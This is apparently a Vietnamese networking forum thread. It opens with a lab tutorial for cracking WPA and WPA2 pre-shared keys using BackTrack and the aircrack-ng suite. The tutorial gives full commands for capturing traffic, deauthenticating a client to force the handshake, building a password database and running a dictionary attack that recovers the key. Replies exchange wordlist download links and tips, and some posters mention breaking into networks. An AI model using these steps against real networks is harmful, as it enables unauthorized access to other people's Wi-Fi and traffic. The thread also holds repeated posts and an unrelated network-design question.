LAB: CRACK KHÓA WPA TRONG MẠNG WLAN

Nhóm thực tập: GTVT



THIẾT BỊ :
vMột AP làm AP target
vMột PC có card wireless làm client target.
vMột PC có card wireless làm attacker
vMột đĩa CD backtrack 3.0 beta

YÊU CẦU:
vĐể crack được wpa thì yêu cầu phải có môi trường cơ sở dữ liệu SQLite. Ta có thể download SQLite tại http://www.sqlite.org/sqlite-3.5.7.tar.gz .
vMột list chứa các password, list này phải đảm bảo có chứa khoá của mạng mà ta cần hack
vMột list chứa các ssid, list này phải đảm bảo có chứa ssid của AP target.
Bài lab này sẽ tiến hành crack các loại khoá là WPA PERSONAL TKIP, WPA PERSONAL AES, WPA2 AES và WPA2 TKIP+AES.

CÁC BƯỚC TIẾN HÀNH CRACK:
vCÀI ĐẶT SQLite như sau:
tar xvzf /root/Desktop/sqlite/sqlite-3.5.7.tar.gz
cd sqlite-3.5.7
./configure --prefix=/usr/local
Make

CRACK WPA TKIP:
·Chuyển card wireless về monitor mode như hình sau:

http:///www.wimaxpro.org/Hinh_upload/Wifipro/GTVT/Crack_WAP/1.jpg (http:///www.wimaxpro.org/Hinh_upload/Wifipro/GTVT/Crack_WAP/1.jpg)
• Dò tìm kênh và MAC address của AP target và client target bằng lệnh airodump-ng ath0 , kết quả dò tìm như hình sau:

http:///www.wimaxpro.org/Hinh_upload/Wifipro/GTVT/Crack_WAP/2_0.jpg

• Tiến hành bắt gói trên kênh và MAC address của AP target vừa tìm được bằng lệnh:
airodump-ng –c 1 –w/root/desktop/capture/wpa –bssid 00:14:bf:05: d6:0c ath0

http:///www.wimaxpro.org/Hinh_upload/Wifipro/GTVT/Crack_WAP/2.jpg

• Tiếp theo, ta dùng tool aireplay và MAC address của client target để tạo ra 4 bước bắt tay với AP target :
Aireplay-ng -0 1 –a 00:14:bf:05: d6:0c –c 00:16:b6:99:74:78 ath0

http:///www.wimaxpro.org/Hinh_upload/Wifipro/GTVT/Crack_WAP/3.jpg

• Quay lại màn hình bắt gói airodump quan sát ta thấy quá trình bắt tay đã diễn ra như hình sau:

http:///www.wimaxpro.org/Hinh_upload/Wifipro/GTVT/Crack_WAP/4.jpg

Thế là ta đã capture được 4 bước bắt tay với AP target.
• Dùng tool airolib-ng để tạo cơ sở dữ liệu cho quá trình crack bằng lệnh airolib-ng vnpro_gtvt_hcm init
với vnpro_gtvt_hcm là tên của cơ sở dữ liệu được chứa mặc định trong home folder.
Sau đó, ta import các list password và list ssid vào cơ sỡ dữ liệu vnpro_gtvt_hcm như sau:
Airolib-ng vnpro_gtvt_hcm import ascii essid dictionary.txt
/* với dictionary.txt là list chứa tên các ssid */

http:///www.wimaxpro.org/Hinh_upload/Wifipro/GTVT/Crack_WAP/5.jpg

Airolib-ng vnpro_gtvt_hcm import ascii passwd password.lst
/* với password.lst là file chứa các password */

http:///www.wimaxpro.org/Hinh_upload/Wifipro/GTVT/Crack_WAP/6.jpg

• Ta kết hợp các ssid với password với nhau sau khi import thành công list password và list ssid bằng lệnh:
Airolib-ng vnpro_gtvt_hcm batch
kiểm tra lại số ssid và password hợp lệ mà ta có bằng lệnh sau:
Airolib-ng vnpro_gtvt_hcm stats

http:///www.wimaxpro.org/Hinh_upload/Wifipro/GTVT/Crack_WAP/7.jpg

• mở một shell mới chạy tool aircrack-ng để tìm khoá :
aircrack-ng –r vnpro_gtvt_hcm /root/desktop/capture/wpa*.cap

http:///www.wimaxpro.org/Hinh_upload/Wifipro/GTVT/Crack_WAP/8.jpg

Sau khi lệnh thực hiện xong, ta thu được key

http:///www.wimaxpro.org/Hinh_upload/Wifipro/GTVT/Crack_WAP/9.jpg

Quá trình crack khoá WPA AES, WPA2 AES và WPA2 TKIP+AES bao gồm các bước thực hiện hoàn toàn như việc crack WPA TKIP. Tiếp theo, ta chỉ kiểm tra quá trình tìm ra khoá của các loại khoá trên

CRACK WAP AES

http:///www.wimaxpro.org/Hinh_upload/Wifipro/GTVT/Crack_WAP/10.jpg

Khoá tìm được :

http:///www.wimaxpro.org/Hinh_upload/Wifipro/GTVT/Crack_WAP/11.jpg

CRACK WPA2 AES

http:///www.wimaxpro.org/Hinh_upload/Wifipro/GTVT/Crack_WAP/12.jpg

http:///www.wimaxpro.org/Hinh_upload/Wifipro/GTVT/Crack_WAP/13.jpg

CRACK WPA2 TKIP+AES

Chạy lệnh tool aircrack để tìm key
http:///www.wimaxpro.org/Hinh_upload/Wifipro/GTVT/Crack_WAP/14.jpg

Tìm được key là vnprogtvthcmtkipvaaes (vnpro gtvt hcm tkip và aes)

http:///www.wimaxpro.org/Hinh_upload/Wifipro/GTVT/Crack_WAP/15.jpg

Chúc mọi người vui !!!

Thank bạn rất nhiều.bài này rất hay và bổ ích(trên lý thuyết).Vì mình đã xâm nhập vào 1 mạng thì cũng không được tốt lắm

[QUOTE=tranmyphuc1988;1139][CENTER][CENTER][SIZE=5][COLOR=Red][B]LAB: CRACK KHÓA WPA TRONG MẠNG WLAN
tôi đang thiết kế mạng WLAN cho trường học. tối đa khoảng 2.500 user. dùng để kinh doanh dịch vụ Internet. ý định dùng các AP kết nối bằng dây đến Switch từng tầng rồi kết nối đến Core tại phòng KT. yêu cầu có xác thực tính cước. thông tin: 12 tầng . mỗi tầng 28 - 36 phòng, mỗi phòng tối đa 8 user. vậy tôi nên dùng giải pháp nào, thiết bị gì . nhờ bạn tính giùm . xin cám ơn.

[QUOTE=tranmyphuc1988;1139][CENTER][CENTER][SIZE=5][COLOR=Red][B]LAB: CRACK KHÓA WPA TRONG MẠNG WLAN
tôi đang thiết kế mạng WLAN cho trường học. tối đa khoảng 2.500 user. dùng để kinh doanh dịch vụ Internet. ý định dùng các AP kết nối bằng dây đến Switch từng tầng rồi kết nối đến Core tại phòng KT. yêu cầu có xác thực tính cước. thông tin: 12 tầng . mỗi tầng 28 - 36 phòng, mỗi phòng tối đa 8 user. vậy tôi nên dùng giải pháp nào, thiết bị gì . nhờ bạn tính giùm . xin cám ơn.

Chào !!!
Việc tính toán để chọn số lượng AP cũng như vị trí đặt thích hợp còn tùy thuộc vào diện tích cũng như đặt điểm riêng của trung tâm. Để biết chính xác chỉ có thể dùng dụng cụ để khảo sát thôi . Bạn tham khảo tại đây: http://wimaxpro.org/forum/showthread.php?t=109

Chúc bạn vui !!!

Ban cho minh hoi la qua trinh crack trong bao lau the. Minh nghi WPA2+AES chac phai rat lau.

Nhan tien cho minh hoi luon la ban da pha duoc WPA ket hop chung thuc nhu PEAP hay dai loai nhu the chua.

thank truoc :D

Chào!!!
+ Thời gian đợi khá lâu gần cả tiếng
+ Radius thì rất khó crack

Chúc bạn vui !!!

thank myphuc .
cho mình hỏi thêm là bạn đã lọc địa chỉ MAC sử dụng RADIUS server chưa . Nếu đã làm với AP : linksys54G thì càng tốt.
mình thấy thằng linksys54G hình như chỉ hỗ trợ mỗi lọc MAC theo danh sách cục bộ mà nó quản lí thôi:confused:

Mình đã đọc bài cơ chế roaming hình như cũng của bạn thì phải ở đâu đó. Mình có thắc mắc là trong quá trình chuyển thì khi client nhận thấy kết nối với AP cũ ko còn đủ tốt thì nó sẽ scan các kênh khác để tìm sóng mạnh hơn. Tuy nhiên mình thắc mắc ở đây là khi nào nó thấy không còn tốt : còn 1 vạch , 2 vạch hay là chết hẳn rồi mới scan . Có cách nào thay đổi giá trị này ko.

[QUOTE=hung_hao_khe;1265]Ban cho minh hoi la qua trinh crack trong bao lau the. Minh nghi WPA2+AES chac phai rat lau.
Quá trình crack WPA2+AES là nhanh hay chậm thì phụ thuộc vào mức độ phức tạp của pswd và kích thướt của cái list password. Theo tôi biết thì một từ điển pswd có dung lượng khoản 21G thì chứa gần đủ hết các pswd. Tôi không có cài từ điển pswd này đâu, đừng hỏi xin tôi nha :D !!

Luôn tiện đây, anh chị nào có tài liệu về "roaming security in wifi" cho tôi xin với. Tôi đang làm đồ án về phần này.
Xin cảm ơn trước !
CHÚC MỌI NGƯỜI VUI KHỎE !

vMột list chứa các password, list này phải đảm bảo có chứa khoá của mạng mà ta cần hack
vMột list chứa các ssid, list này phải đảm bảo có chứa ssid của AP target.
mình chưa hiểu chỗ này lắm, lấy đâu ra 2 list này đây, bạn có thể share ko ?

Ai biết phần mềm nào để tạo ra bộ từ điển hoặc biết link download các bộ từ điển tạo săn thì cho mình xin link với nha.

Cảm ơn nhiều.

mail: hundamo@ymail.com

Sao không thấy hình được vậy. Nhờ tranmyphuc1988 úp lại để em xem với. Đang nghiên cứu về vấn đề này nên quan tâm lắm. Thanks bạn nhiều !

:confused: minh thay cach nay mang tinh chat lab kha nhieu. neu key ma hoa wpa du strong thi that kho de be khoa. Phuc co bit cach nao kha thi hon khong

Nhan tien minh cung cam on bai huong dan crack wep key cua ban.

Chuc ban thu hoach duoc nhieu thanh cong:)

phuc share dum anh em cai list database password di, cai do la quan trong nhat de crack ma.

thanks

hic
Em thay. O viec crack WPA Thong thuong o Viet nam minh pass dat thuong kho co trong tu dien, voi lai kiem tra theo kieu tu dien do minh dat pass dai dai them dau cach hoac ky tu dac bit thi chac la nghi crack luon.
Hinh nhu van chua co cach nao de crack WPA de nhu crack WEP thi fai.

ec. Ma em cung ko ro dat pass trong AP co dc dung ky tu dac bit ko nhi. Vi nha ko co dieu kien nen chua thu bao jo nen ko bit co dc ko nua. Hihi co j sai cac bac bao cau de rut kinh nghiem nha :D
(Linh moi ma)

chẳng thể nào crack được. Chỉ có tính chất lab thôi.
Làm gì có cái từ điển nào mà chứa sẵn những thứ mình cần như thế.

Bác nào có cách khác hay hơn ko?
Ko cần dùng từ điển?

cái này dùng từ điển để so sánh = pass

có cách nào bruceforce Wifi không ta?

You can download here

http://distro.ibiblio.org/pub/linux/distributions/openwall/wordlists/all.gz

Bai nay rat hay nhung minh thac mac mot so dieu mong ban phuc va cac ban chi dum. Cho minh hoi list chua Password va list SSID co san trong sqlite ha?? Card mang Desktop Adapter D-Link DWA-520 co rack duoc WPA va WPA2 khong !???!?!? Thank nhiu nhiu ....

Bai nay rat hay nhung minh thac mac mot so van de mong ban phuc va cac ban chi dum. Cho minh hoi cai list Password va list SSID deu chua trong Sqlite ha !?!?? Card mang Desktop Adapter D-Link DWA-520 co rack duoc WPA va WPA2 khong???!!?? cai card nay minh da hack thanh cong voi chuan WEP. Thank cac ban nhiu nhiu .....

[-([-(Bai nay rat hay nhung minh co mot vai van de mong ban phuc va cac ban chi dum. Cho minh hoi cai list chua PASSWORD va list chua SSID deu chua trong Sqlite ha!????!?!? Cai card mang cua minh la Desktop Adapter D-Link DWA-520 thi co Rack duoc WPA va WPA2 khong !!??!??!? voi card mang nay minh da Rack thanh cong chuan WEP. Thank cac ban nhieu nhieu ......:-@

Bai nay rat hay nhung minh co mot vai van de mong ban phuc va cac ban chi dum. Cho minh hoi cai list chua PASSWORD va list chua SSID deu chua trong Sqlite ha!????!?!? Cai card mang cua minh la Desktop Adapter D-Link DWA-520 thi co Rack duoc WPA va WPA2 khong !!??!??!? voi card mang nay minh da Rack thanh cong chuan WEP. Thank cac ban nhieu nhieu ......

Bai nay rat hay nhung minh co mot vai van de mong ban phuc va cac ban chi dum. Cho minh hoi cai list chua PASSWORD va list chua SSID deu chua trong Sqlite ha!????!?!? Cai card mang cua minh la Desktop Adapter D-Link DWA-520 thi co Rack duoc WPA va WPA2 khong !!??!??!? voi card mang nay minh da Rack thanh cong chuan WEP. Thank cac ban nhieu nhieu ....../:)

Bai nay rat hay nhung minh co mot vai van de mong ban phuc va cac ban chi dum. Cho minh hoi cai list chua PASSWORD va list chua SSID deu chua trong Sqlite ha!????!?!? Cai card mang cua minh la Desktop Adapter D-Link DWA-520 thi co Rack duoc WPA va WPA2 khong !!??!??!? voi card mang nay minh da Rack thanh cong chuan WEP. Thank cac ban nhieu nhieu ......

Bai nay rat hay nhung minh co mot vai van de mong ban phuc va cac ban chi dum. Cho minh hoi cai list chua PASSWORD va list chua SSID deu chua trong Sqlite ha!????!?!? Cai card mang cua minh la Desktop Adapter D-Link DWA-520 thi co Rack duoc WPA va WPA2 khong !!??!??!? voi card mang nay minh da Rack thanh cong chuan WEP. Thank cac ban nhieu nhieu ......
Bạn vào đây tải file passview+dic về trong đó có sẵn vài dic mình sưu tầm được và pm tạo dic,bạn do key wpa nên xài AIRCRACK-NG-1.0-RC2 trở lên,tốc độ tăng hơn nhiều,cpu amd x2 tăng gấp đôi,cpu core 2 tăng gấp 4 lần so với bản rc1,đã crack được WEP thì WPA cũng được thôi,mình xài card đó crack được WPA2/AES luôn đó,xài bằng ERW trên winxp.
Link:
http://www.mediafire.com/?sharekey=5...db6fb9a8902bda (http://www.mediafire.com/?sharekey=5ff93e937713ffd5d2db6fb9a8902bda)

Bạn vào đây tải file passview+dic về trong đó có sẵn vài dic mình sưu tầm được và pm tạo dic,bạn do key wpa nên xài AIRCRACK-NG-1.0-RC2 trở lên,tốc độ tăng hơn nhiều,cpu amd x2 tăng gấp đôi,cpu core 2 tăng gấp 4 lần so với bản rc1,đã crack được WEP thì WPA cũng được thôi,mình xài card đó crack được WPA2/AES luôn đó,xài bằng ERW trên winxp.
Link:
http://www.mediafire.com/?sharekey=5...db6fb9a8902bda (http://www.mediafire.com/?sharekey=5ff93e937713ffd5d2db6fb9a8902bda)
có pass bạn ơi,cho xin pass down đi bạn

Crack mai ma chang duoc may Pro oi.? Co Pro nao cao thu hon chi giao dum voi nha.
mtlaptop@yahoo.com. Cam on Pro nhieu nhe.

cho em hỏi từ chỗ aireplay-ng để có 4whs có lâu không anh>sao em làm rất nhiều lệnh đó liên tục trong 15 phút nhưng vẫn không xảy ra 4whs.

Em thử là đúng hướng theo đúng hướng dẫn mà vẫn không được.
Để có 4 whs em đã cho máy station tắt kết nối và kết nối lại nhưng thay vì có 4whs thì nó chỉ hiện ra DECLOAK mong anh em nào biết chỉ thêm được không.